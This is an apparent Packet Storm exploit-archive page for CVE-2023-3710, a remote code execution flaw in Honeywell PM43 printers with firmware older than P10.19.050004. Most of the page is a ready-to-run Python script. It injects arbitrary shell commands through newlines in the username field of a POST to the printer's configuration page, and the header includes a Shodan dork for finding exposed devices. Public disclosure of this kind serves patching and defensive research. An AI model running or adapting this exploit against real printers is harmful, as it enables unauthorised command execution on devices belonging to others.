exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Honeywell PM43 Remote Code Execution

Honeywell PM43 Remote Code Execution
Posted Mar 14, 2024
Authored by ByteHunter

Honeywell PM43 versions prior to P10.19.050004 suffer from a remote code execution vulnerability.

tags | exploit, remote, code execution
advisories | CVE-2023-3710
SHA-256 | af3705248c7122eb4d11be4c13209b3526cbee77ed228747c3f55800ef9fb1ef

Honeywell PM43 Remote Code Execution

Change Mirror Download
#- Exploit Title: Honeywell PM43 < P10.19.050004 - Remote Code Execution (RCE)
#- Shodan Dork: http.title:PM43 , PM43
#- Exploit Author: ByteHunter
#- Email: 0xByteHunter@proton.me
#- Frimware Version: versions prior to P10.19.050004
#- Tested on: P10.17.019667
#- CVE : CVE-2023-3710


import requests
import argparse

BLUE = '\033[94m'
YELLOW = '\033[93m'
RESET = '\033[0m'

def banner():
banner = """
╔════════════════════════════════════════════════╗
CVE-2023-3710
Command Injection in Honeywell PM43 Printers
Author: ByteHunter
╚════════════════════════════════════════════════╝
"""
print(YELLOW + banner + RESET)


def run_command(url, command):
full_url = f"{url}/loadfile.lp?pageid=Configure"
payload = {
'username': f'hunt\n{command}\n',
'userpassword': 'admin12345admin!!'
}
try:
response = requests.post(full_url, data=payload, verify=False)
response_text = response.text
html_start_index = response_text.find('<html>')
if html_start_index != -1:
return response_text[:html_start_index]
else:
return response_text
except requests.exceptions.RequestException as e:
return f"Error: {e}"

def main():
parser = argparse.ArgumentParser(description='Command Injection PoC for Honeywell PM43 Printers')
parser.add_argument('--url', dest='url', help='Target URL', required=True)
parser.add_argument('--run', dest='command', help='Command to execute', required=True)

args = parser.parse_args()

response = run_command(args.url, args.command)
print(f"{BLUE}{response}{RESET}")

if __name__ == "__main__":
banner()
main()

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close